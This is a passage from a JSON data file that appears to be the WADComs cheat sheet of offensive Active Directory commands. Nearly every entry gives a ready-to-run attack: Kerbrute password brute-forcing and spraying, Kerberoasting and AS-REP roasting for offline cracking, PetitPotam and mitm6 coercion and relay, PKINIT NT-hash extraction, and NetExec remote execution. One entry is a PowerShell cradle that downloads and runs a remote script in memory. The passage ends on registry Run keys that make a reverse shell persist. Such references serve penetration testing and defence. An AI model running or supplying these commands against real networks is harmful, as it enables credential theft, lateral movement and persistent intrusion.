2a3de7fe356ee524cc9f3d579f2e0aa7\n","mitre":[],"requires":["NTLM hash","Username"],"services":["Kerberos"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/getTGT.py","https://www.tarlogic.com/en/blog/how-to-attack-kerberos/"],"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Kerbrute-BruteForce","toolId":"wadcoms:Kerbrute","toolName":"Kerbrute","name":"Kerbrute-BruteForce","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"capability":["Enumeration"],"nativeCategory":["Enumeration"],"command":"cat credentials.txt | kerbrute_linux_amd64 -d test.local bruteforce -","description":"ropnop's kerbrute bruteforces and enumerates valid Active Directory accounts through Kerberos Pre-Authentication. The following command will attempt to brute force valid username and passwords logins given a list of credentials (in the format `username:password`).\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tCredential List: credentials.txt\n","mitre":[],"requires":["No credentials"],"services":["Kerberos"],"references":["https://github.com/ropnop/kerbrute"],"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Kerbrute-BruteUser","toolId":"wadcoms:Kerbrute","toolName":"Kerbrute","name":"Kerbrute-BruteUser","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Enumeration"],"nativeCategory":["Enumeration"],"command":"kerbrute bruteuser -d test.local passwords.txt john","description":"ropnop's kerbrute bruteforces and enumerates valid Active Directory accounts through Kerberos Pre-Authentication. The following command will bruteforce an account against a list of provided passwords given a username.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tPassword List: passwords.txt\n\n\tUsername: john\n","mitre":[],"requires":["Username"],"services":["Kerberos"],"references":["https://github.com/ropnop/kerbrute"],"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Kerbrute-PasswordSpray","toolId":"wadcoms:Kerbrute","toolName":"Kerbrute","name":"Kerbrute-PasswordSpray","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Enumeration"],"nativeCategory":["Enumeration"],"command":"kerbrute passwordspray -d test.local domain_users.txt password123","description":"ropnop's kerbrute bruteforces and enumerates valid Active Directory accounts through Kerberos Pre-Authentication. The following command will perform a password spray account against a list of provided users given a password.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername List: domain_users.txt\n\n\tPassword: password123\n","mitre":[],"requires":["Username"],"services":["Kerberos"],"references":["https://github.com/ropnop/kerbrute"],"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Kerbrute-UserEnum","toolId":"wadcoms:Kerbrute","toolName":"Kerbrute","name":"Kerbrute-UserEnum","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Enumeration"],"nativeCategory":["Enumeration"],"command":"kerbrute userenum -d test.local usernames.txt","description":"ropnop's kerbrute bruteforces and enumerates valid Active Directory accounts through Kerberos Pre-Authentication. The following command will attempt to enumerate valid usernames given a list of usernames to try.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername List: usernames.txt\n","mitre":[],"requires":["No credentials"],"services":["Kerberos"],"references":["https://github.com/ropnop/kerbrute"],"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:LDAPSearch-Creds","toolId":"wadcoms:LDAPSearch","toolName":"LDAPSearch","name":"LDAPSearch-Creds","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"capability":["Enumeration"],"nativeCategory":["Enumeration"],"command":"ldapsearch -h test.local -D 'ldap@test.local' -w password123 -b 'dc=test,dc=local'","description":"ldapsearch is a Linux based tool that opens a connection to an LDAP server, binds, and performs a search using specified parameters. The following command will attempt to find sensitive information (such as leaked creds), by querying all LDAP objects, essentially dumping all the data that an anonymous user can access.\n\nCommand Reference:\n\n\tDomain: test.local\n \n\tUsername: ldap\n \n\tPassword: password123\n","mitre":[],"requires":["Username","Password"],"services":["LDAP"],"references":["https://linux.die.net/man/1/ldapsearch"],"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:LDAPSearch-NoCreds","toolId":"wadcoms:LDAPSearch","toolName":"LDAPSearch","name":"LDAPSearch-NoCreds","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"capability":["Enumeration"],"nativeCategory":["Enumeration"],"command":"ldapsearch -LLL -x -H ldap://test.local -b'' -s base '(objectclass=\\*)'","description":"ldapsearch is a Linux based tool that opens a connection to an LDAP server, binds, and performs a search using specified parameters. The following command will attempt to find sensitive information (such as leaked creds), by querying all LDAP objects, essentially dumping all the data that an anonymous user can access.\n\nCommand Reference:\n\n\tDomain: test.local\n","mitre":[],"requires":["No credentials"],"services":["LDAP"],"references":["https://linux.die.net/man/1/ldapsearch"],"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Mitm6","toolId":"wadcoms:Mitm6","toolName":"Mitm6","name":"Mitm6","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"mitm6 -d test.local --ignore-nofqnd","description":"mitm6 is a pentesting tool that exploits the default configuration of Windows to take over the default DNS server. It does this by replying to DHCPv6 messages, providing victims with a link-local IPv6 address and setting the attackers host as default DNS server. The following command will respond to DHCPv6 messages and set the DNS server to the attack host IP. Leverage this command with ntlmrelayx.py to capture the WPAD configuration requests. \n\nCommand Reference:\n\n\tDomain: test.local\n","mitre":[],"requires":["No credentials"],"services":["DNS"],"references":["https://github.com/dirkjanm/mitm6","https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/"],"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:NetExec-Creds-coerce_plus","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-Creds-coerce_plus","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Enumeration","Execution"],"nativeCategory":["Enumeration","Privilidge Escalation","Exploitation","Laterl movement"],"command":"nxc smb 10.10.10.1 -u john -p password123 -M coerce_plus","description":"\"NetExec (a.k.a nxc) is a network pentesting suite that has many modules that can be listed via nxc <protocol> -L. The coerece_plus module will enumarate a target ip, dnsname, list of targets or ip range for different coherence attacks. It will indicate in the output which a target is vulnrable to. Providing you also a means for exploit by adding where your listener/reciving system is(-LISTENER=10.10.10.1) and which exploit you want it to use. The module was recently updated 7 days ago to work on the latest windows build\"\n\n Command Reference:\n\n Target IP: 10.10.10.1\n\n Username: john\n\n Password: password123 \n","mitre":[],"requires":["Username","Password"],"services":["SMB"],"references":["https://blog.redteam-pentesting.de/2025/windows-coercion/","https://github.com/Pennyw0rth/NetExec","https://www.netexec.wiki/smb-protocol/scan-for-vulnerabilities"],"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:NetExec-Enum-LDAP","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-Enum-LDAP","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"capability":["Enumeration"],"nativeCategory":["Enumeration"],"command":"nxc ldap 10.10.10.1 -u 'john' -p 'password123' --trusted-for-delegation --password-not-required --admin-count --users --groups","description":"\"NetExec (a.k.a nxc) is a network service exploitation tool that helps automate assessing the security of large networks.\" - https://www.netexec.wiki/. This command will enumerate domain groups, local groups, users, user descriptions, users trusted for delegation, users without a password, You can also use CIDR notation to target a range of ip addresses (i.e. 10.10.10.0/24).\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Username","Password"],"services":["LDAP"],"references":["https://github.com/Pennyw0rth/NetExec","https://www.netexec.wiki/"],"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:NetExec-Enum-SMB-Anonymous","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-Enum-SMB-Anonymous","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"capability":["Enumeration"],"nativeCategory":["Enumeration"],"command":"nxc smb 10.10.10.1 -u 'a' -p ''","description":"\"NetExec (a.k.a nxc) is a network service exploitation tool that helps automate assessing the security of large networks.\" - https://www.netexec.wiki/. This command will enumerate the SMB host using anonymous access. \n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n","mitre":[],"requires":["No credentials"],"services":["SMB"],"references":["https://github.com/Pennyw0rth/NetExec","https://www.netexec.wiki/"],"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:NetExec-Enum-SMB-Null","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-Enum-SMB-Null","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"capability":["Enumeration"],"nativeCategory":["Enumeration"],"command":"nxc smb 10.10.10.1 -u '' -p ''","description":"\"NetExec (a.k.a nxc) is a network service exploitation tool that helps automate assessing the security of large networks.\" - https://www.netexec.wiki/. This command will enumerate the SMB host using a null session. \n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n","mitre":[],"requires":["No credentials"],"services":["SMB"],"references":["https://github.com/Pennyw0rth/NetExec","https://www.netexec.wiki/"],"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:NetExec-Enum-SMB-Relay-List","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-Enum-SMB-Relay-List","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"capability":["Enumeration"],"nativeCategory":["Enumeration"],"command":"nxc smb smb_host.txt --gen-relay-list output.txt","description":"\"NetExec (a.k.a nxc) is a network service exploitation tool that helps automate assessing the security of large networks.\" - https://www.netexec.wiki/. The following command will enumerate a list of SMB hosts with signing not enforced, allowing you to relay credentials to them using ntlmrelayx.py.\n\nCommand Reference:\n\n\tSMB Hosts: smb_hosts.txt\n","mitre":[],"requires":["No credentials"],"services":["SMB"],"references":["https://github.com/Pennyw0rth/NetExec","https://www.netexec.wiki/"],"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:NetExec-Enum-SMB","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-Enum-SMB","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"capability":["Enumeration"],"nativeCategory":["Enumeration"],"command":"nxc smb 10.10.10.1 -u 'john' -p 'password123' --groups --local-groups --loggedon-users --rid-brute --sessions --users --shares --pass-pol","description":"\"NetExec (a.k.a nxc) is a network service exploitation tool that helps automate assessing the security of large networks.\" - https://www.netexec.wiki/. This command will enumerate domain groups, local groups, logged on users, relative identifiers (RIDs), sessions, domain users, SMB shares/permissions, and get the domain password policy. You can also use CIDR notation to target a range of ip addresses (i.e. 10.10.10.0/24).\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Username","Password"],"services":["SMB"],"references":["https://github.com/Pennyw0rth/NetExec","https://www.netexec.wiki/"],"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:NetExec-Exec-SMB","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-Exec-SMB","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"nxc smb 10.10.10.1 -u 'john' -p 'password123' -X '$Host'","description":"\"NetExec (a.k.a nxc) is a network service exploitation tool that helps automate assessing the security of large networks.\" - https://www.netexec.wiki/. This command will execute a powershell command on the target machine if the user has Administrator privileges. using \"-x\" will execute from cmd.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Username","Password"],"services":["SMB"],"references":["https://github.com/Pennyw0rth/NetExec","https://www.netexec.wiki/"],"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:NetExec-LDAP-ASREPRoasting","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-LDAP-ASREPRoasting","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Credential Access"],"nativeCategory":["Credential Access","AS-REP Roasting"],"command":"nxc ldap 10.10.10.1 -u users.txt -p '' --asreproast output.txt","description":"NetExec (formerly CrackMapExec) performs an AS-REP Roasting attack via the LDAP service.\nThis command attempts to enumerate domain accounts that do not require pre-authentication \nand requests Kerberos AS-REP responses for them. The extracted encrypted ticket-granting \nticket (TGT) hashes are saved into the specified file and can later be cracked offline \nto recover plaintext credentials.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\tDomain: test.local\n\tUsername List: users.txt\n\tPassword: (empty string)\n\tOutput File: output.txt\n","mitre":["T1558.004"],"requires":["Username","NTLM hash"],"services":["LDAP"],"references":["https://github.com/Pennyw0rth/NetExec","https://attack.mitre.org/techniques/T1558/004/"],"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:NetExec-LDAP-Kerberoasting","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-LDAP-Kerberoasting","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Credential Access"],"nativeCategory":["Credential Access","Kerberoasting"],"command":"nxc ldap 10.10.10.1 -u 'john' -p 'password123' --kerberoasting output.txt","description":"NetExec (formerly CrackMapExec) performs a Kerberoasting attack via the LDAP service.\nThis command authenticates with the given domain account, enumerates Service Principal Name (SPN) accounts, \nand extracts their Kerberos ticket hashes, saving them into the specified file.\nThe obtained hashes can later be cracked offline using brute force or wordlists.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\tDomain: test.local\n\tUsername: john\n\tPassword: password123\n\tOutput File: output.txt\n","mitre":["T1558.003"],"requires":["Username","Password","NTLM hash"],"services":["LDAP"],"references":["https://github.com/Pennyw0rth/NetExec","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/kerberoast","https://attack.mitre.org/techniques/T1558/003/"],"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:NetExec-SMB-Password-Spray","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-SMB-Password-Spray","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"nxc smb 10.10.10.1 -u users.txt -p password123","description":"\"NetExec (a.k.a nxc) is a network service exploitation tool that helps automate assessing the security of large networks.\" - https://www.netexec.wiki/. This command will perform password spraying over SMB against the domain controller.\n\nCommand Reference:\n\n\tDomain Controller IP: 10.10.10.1\n\n\tUsername List: users.txt\n\n\tPassword: password123\n","mitre":[],"requires":["Username"],"services":["SMB"],"references":["https://github.com/Pennyw0rth/NetExec","https://www.netexec.wiki/"],"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:NetExec-SMB-Timeroasting","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-SMB-Timeroasting","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Credential Access"],"nativeCategory":["Credential Access","Timeroasting"],"command":"nxc smb 10.10.10.1 -M timeroast","description":"NetExec (formerly CrackMapExec) performs a Timeroasting attack via the SMB service.\nThis command targets the remote Windows host and abuses the Kerberos protocol by \nmanipulating ticket lifetimes or requesting renewable service tickets. \nIt can help attackers obtain long-lived Kerberos tickets for offline cracking \nor later lateral movement.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\tModule: timeroast\n","mitre":[],"requires":["NTLM hash","Username"],"services":["SMB"],"references":["https://github.com/Pennyw0rth/NetExec","https://cybersecurity.bureauveritas.com/blog/timeroasting-attacking-trust-accounts-in-active-directory"],"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Nmap-Krb5-Enum-Users","toolId":"wadcoms:Nmap","toolName":"Nmap","name":"Nmap-Krb5-Enum-Users","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Enumeration"],"nativeCategory":["Enumeration"],"command":"nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm='test.local',userdb=usernames.txt 10.10.10.1","description":"Nmap's `krb5-enum-users` script attempts to bruteforce and enumerate valid Active Directory accounts through Kerberos Pre-Authentication. The following command will attempt to enumerate valid usernames given a list of usernames to try.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername List: usernames.txt\n","mitre":[],"requires":["No credentials"],"services":["Kerberos"],"references":["https://nmap.org/download.html","https://nmap.org/nsedoc/scripts/krb5-enum-users.html"],"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:PKINIT-getnthash","toolId":"wadcoms:PKINIT","toolName":"PKINIT","name":"PKINIT-getnthash","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["Exploitation","PrivEsc"],"command":"KRB5CCNAME=out.ccache python3 getnthash.py test.local/DC01\\$ -key 6e63333c372d7fbe64dab63f36673d0cd03bfb92b2a6c96e70070be7cb07f773","description":"PKINIT getnthash.py request a TGS for yourself using Kerberos U2U. This will include with the PAC which in turn contains the NT hash that you can decrypt with the AS-REP key that you got from your TGT request using gettgtpkinit.py from PKINIT. Use the TGT from gettgtpkinit.py in your KRB5CCNAME env variable.\n\nCommand Reference:\n\n Domain: test.local\n\n Host that you got the TGT from: DC01\n\n TGT from gettgtpkinit.py: out.ccache\n\n AS-REP key: 6e63333c372d7fbe64dab63f36673d0cd03bfb92b2a6c96e70070be7cb07f773\n","mitre":[],"requires":["Kerberos ticket"],"services":["Kerberos"],"references":["https://github.com/dirkjanm/PKINITtools","https://dirkjanm.io/ntlm-relaying-to-ad-certificate-services/"],"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:PKINIT-gettgtpkinit","toolId":"wadcoms:PKINIT","toolName":"PKINIT","name":"PKINIT-gettgtpkinit","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["Exploitation","PrivEsc"],"command":"python3 gettgtpkinit.py test.local/DC01\\$ -cert-pfx crt.pfx -pfx-pass password123 out.ccache","description":"PKINIT gettgtpkinit.py request a TGT using a PFX file, either as file or as base64 encoded blob, or PEM files for cert+key. This uses Kerberos PKINIT and will output a TGT into the specified ccache. It will also print the AS-REP encryption key which you may need for the getnthash.py tool.\n\nCommand Reference:\n\n Domain: test.local\n\n Host that you got the certificate from: DC01\n\n PFX file: crt.pfx\n\n PFX file password: password123\n\n TGT requested: out.ccache\n","mitre":[],"requires":["Username","Password","Certificate"],"services":["Kerberos"],"references":["https://github.com/dirkjanm/PKINITtools","https://dirkjanm.io/ntlm-relaying-to-ad-certificate-services/"],"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:PSADmodule-Kerbaroasting","toolId":"wadcoms:PSADmodule","toolName":"PSADmodule","name":"PSADmodule-Kerbaroasting","source":"WADComs","platform":["Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"Get-ADUser -Filter {ServicePrincipalName -ne \"$null\" -and Enabled -eq $true} -Properties ServicePrincipalName | select -ExpandProperty ServicePrincipalName | % { $spn = $_; Add-Type -AssemblyName System.IdentityModel; $ticket = New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $spn; $ticketBytes = $ticket.GetRequest(); $ticketBase64 = [System.Convert]::ToBase64String($ticketBytes); $account = (Get-ADUser -Filter {ServicePrincipalName -eq $spn} -Properties SamAccountName).SamAccountName; Write-Output \"===== $account : $spn =====`n$ticketBase64\" } | Out-File -FilePath \"kerberos_tickets.txt\" -Encoding ASCII","description":"Kerberoasting is the act of requesting service tickes for accounts that have an SPN set, and then attempting to crack those hashes offline. \nThis one liner using the powershell AD module serves less as a feasiable attack and more as a PoC that the AD module with some ingenuity\ncan be used to exploit many vectors within AD that you otherwise import tools that are not signed, need obfiscation, require AV/EDR bypass or other\nsteps that may trigger alerts.\n","mitre":[],"requires":["PowerShell"],"services":["Kerberos"],"references":["https://github.com/samratashok/ADModule"],"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:PetitPotam","toolId":"wadcoms:PetitPotam","toolName":"PetitPotam","name":"PetitPotam","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"python3 PetitPotam.py -d test.local -u john -p password123 10.10.10.2 10.10.10.1","description":"PetitPotam leverages the MS-EFSRPC API to connect to a Windows host, hijack the authentication session, and trigger an authentication from the target host to an attacker controlled host (usually SMB or HTTP server). This captured authentication can then be relayed to authenticate to other hosts and perform more attacks. See more in ntlmrelayx.py.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tAttacker IP: 10.10.10.2\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Password","Username"],"services":["RPC","NTLM"],"references":["https://github.com/topotam/PetitPotam","https://www.truesec.com/hub/blog/from-stranger-to-da-using-petitpotam-to-ntlm-relay-to-active-directory"],"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Powershell-ADModule-enum","toolId":"wadcoms:Powershell","toolName":"Powershell","name":"Powershell-ADModule-enum","source":"WADComs","platform":["Windows"],"capability":["Discovery","Credential Access"],"nativeCategory":["Discovery","Credential Access"],"command":"iex (new-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/ADModule/master/Import-ActiveDirectory.ps1');Import-ActiveDirectory","description":"The Active Directory Module from powershell can be used to preform most needed enumaration tasks as well as some exploitation tasks revoling around ACL/DACL/Delegation abuse. The modules does not need to be installed on the target, it is signed by microsoft and thus greatly reduces the risk of detection and lastly works without restriction in constrained language mode(CLM). This entry focused on downloading and importing it in memory for a given session, one liners can be found in other entries of WADCOMs\n","mitre":[],"references":["https://docs.microsoft.com/en-us/powershell/module/activedirectory/","https://github.com/samratashok/ADModule","https://www.labofapenetrationtester.com/2018/10/domain-enumeration-from-PowerShell-CLM.html"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:PwshADmodule-DelegationAttack-Enum","toolId":"wadcoms:PwshADmodule","toolName":"PwshADmodule","name":"PwshADmodule-DelegationAttack-Enum","source":"WADComs","platform":["Windows"],"capability":["Enumeration"],"nativeCategory":["Enumeration"],"command":"# 1. Unconstrained (turned on for all Domain controllers by default)\n(Get-ADForest).Domains | % { Get-ADComputer -Filter {TrustedForDelegation -eq $true} -Server $_ | select Name,DNSHostName; Get-ADUser -Filter {TrustedForDelegation -eq $true} -Server $_ | select Name,SamAccountName }\n\n\n# 2. Constrained (with protocol transition check)\n(Get-ADForest).Domains | % { Get-ADComputer -Filter {msDS-AllowedToDelegateTo -like \"*\"} -Properties msDS-AllowedToDelegateTo,TrustedToAuthForDelegation -Server $_ | select Name,TrustedToAuthForDelegation,msDS-AllowedToDelegateTo; Get-ADUser -Filter {msDS-AllowedToDelegateTo -like \"*\"} -Properties msDS-AllowedToDelegateTo,TrustedToAuthForDelegation -Server $_ | select Name,TrustedToAuthForDelegation,msDS-AllowedToDelegateTo }\n\n# 3. RBCD (which object is already configured)\n(Get-ADForest).Domains | % { Get-ADComputer -Filter * -Properties msDS-AllowedToActOnBehalfOfOtherIdentity -Server $_ | ? {$_.\"msDS-AllowedToActOnBehalfOfOtherIdentity\"} | select Name,DNSHostName }\n\n# 4. RBCD (which object can configure it - write access)\n(Get-ADForest).Domains | % { Get-ADComputer -Filter * -Properties nTSecurityDescriptor -Server $_ | ? {$_.nTSecurityDescriptor.Access | ? {$_.ActiveDirectoryRights -match \"GenericWrite|WriteProperty\" -and $_.IdentityReference -notmatch \"SYSTEM|Domain Admins\"}} | select Name }","description":"Having imported the pwsh AD module referenced in the project, we can begin to use it to enumerate for potential points of exploit\none of the prime being kerberos delegation attacks. The following 4 line commands will enumerate the entire AD forest for RBCD, Constrained and Unconstrained delegation attacks.\nNote that we will also factor in protocol trainsiton as those change the attack vector slightly. See references below\n","mitre":[],"requires":["PowerShell"],"references":["https://redfoxsec.com/blog/attacking-kerberos-delegation/","https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html","https://dirkjanm.io/krbrelayx-unconstrained-delegation-abuse-toolkit/","https://github.com/samratashok/ADModule"],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:PwshADmodule-Initial-Enum","toolId":"wadcoms:PwshADmodule","toolName":"PwshADmodule","name":"PwshADmodule-Initial-Enum","source":"WADComs","platform":["Windows"],"capability":["Enumeration"],"nativeCategory":["Enumeration"],"command":"#Getting all DCs in the forest\n(Get-ADForest).Domains | % { Get-ADDomainController -DomainName $_ -Discover }\n\n#Getting all users in the forest\n(Get-ADForest).Domains | % { Get-ADUser -Filter * -Server $_ }\n\n#Getting all computers in the forest\n(Get-ADForest).Domains | % { Get-ADComputer -Filter * -Server $_ }\n\n#Mapping out entire trust relationships\nGet-ADTrust -Filter '(intraForest -ne $True) -and (ForestTransitive -ne $True)' | Select-Object Source,Target,Name\n\n#Getting all groups in a domain. Note that the select statement will limit the output to only the matching fields the object contains\nGet-ADGroup -Filter * | Select-Object SamAccountName, GroupScope, DistinguishedName","description":"These commands provide a quick refernece for using the AD module to get situational awerness of the AD environment.\nNote that to get more commands that you can run, use the get command cmdlet, e.g. `Get-Command -Module ActiveDirectory` But Thes\nare the standard commands that will get you standard. Feel free to replace the first pipe with the -server \"your domain\" if you dont want\nto enumarate the entire forest. For more info on using the AD module, please check out our discussion on the AD module in WADCOMs.\n","mitre":[],"references":["https://docs.microsoft.com/en-us/powershell/module/activedirectory/","https://github.com/samratashok/ADModule"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:PyLDAPmonitor","toolId":"wadcoms:PyLDAPmonitor","toolName":"PyLDAPmonitor","name":"PyLDAPmonitor","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"capability":["Enumeration"],"nativeCategory":["Enumeration"],"command":"python3 ldapmonitor.py -u 'john' -d 'TEST.local' -p 'password123' --dc-ip 10.10.10.1","description":"ldapmonitor.py allows you to monitor creation, deletion and changes to LDAP objects live during your pentest.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tAttacker IP: 10.10.10.2\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Password","Username","NTLM hash"],"services":["LDAP","Kerberos","NTLM"],"references":["https://github.com/p0dalirius/LDAPmonitor/tree/master/python"],"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:PyWhisker","toolId":"wadcoms:PyWhisker","toolName":"PyWhisker","name":"PyWhisker","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"python3 pywhisker.py -d \"test.local\" -u \"john\" -p \"password123\" --target \"user2\" --action \"list\" --dc-ip \"10.10.10.1\"","description":"pyWhisker is a tool allowing users to manipulate the msDS-KeyCredentialLink attribute of a target user/computer to obtain full control over that object. It's based on Impacket and on our Python equivalent of Michael Grafnetter's DSInternals called PyDSInternals. This tool, along with Dirk-jan's PKINITtools allow for a complete primitive exploitation on UNIX-based systems only.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Password","Username"],"services":["Kerberos"],"references":["https://github.com/shutdownrepo/pywhisker"],"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:RPCClient-Anonymous","toolId":"wadcoms:RPCClient","toolName":"RPCClient","name":"RPCClient-Anonymous","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"capability":["Enumeration"],"nativeCategory":["Enumeration"],"command":"rpcclient -U '' -N 10.10.10.1","description":"rpcclient is a tool used for executing client side MS-RPC functions to manage Windows NT clients from Unix workstatios. From an offensive security standpoint, it can be used to enumerate users, groups, and other potentially sensitive information. The following command attempt to connect to the NetBIOS server anonymously, in order to enumerate using MS-RPC available commands/functions.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n","mitre":[],"requires":["No credentials"],"services":["RPC"],"references":["https://www.samba.org/samba/docs/current/man-html/rpcclient.1.html","https://www.ired.team/offensive-security/enumeration-and-discovery/enumerating-windows-domains-using-rpcclient-through-socksproxy-bypassing-command-line-logging"],"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Regexe-Persistence","toolId":"wadcoms:Regexe","toolName":"Regexe","name":"Regexe-Persistence","source":"WADComs","platform":["Windows"],"capability":["Persistence"],"nativeCategory":["Persistence"],"command":"reg.exe add \"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v Persistence /t REG_SZ /d \"C:\\Path\\To\\revshell.exe\"\n\nreg.exe add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v Persistence /t REG_SZ /d \"C:\\Path\\To\\revshell.exe\"","description":"It is possible to gain persistence on a windows machine by adding reg keys that will execute an 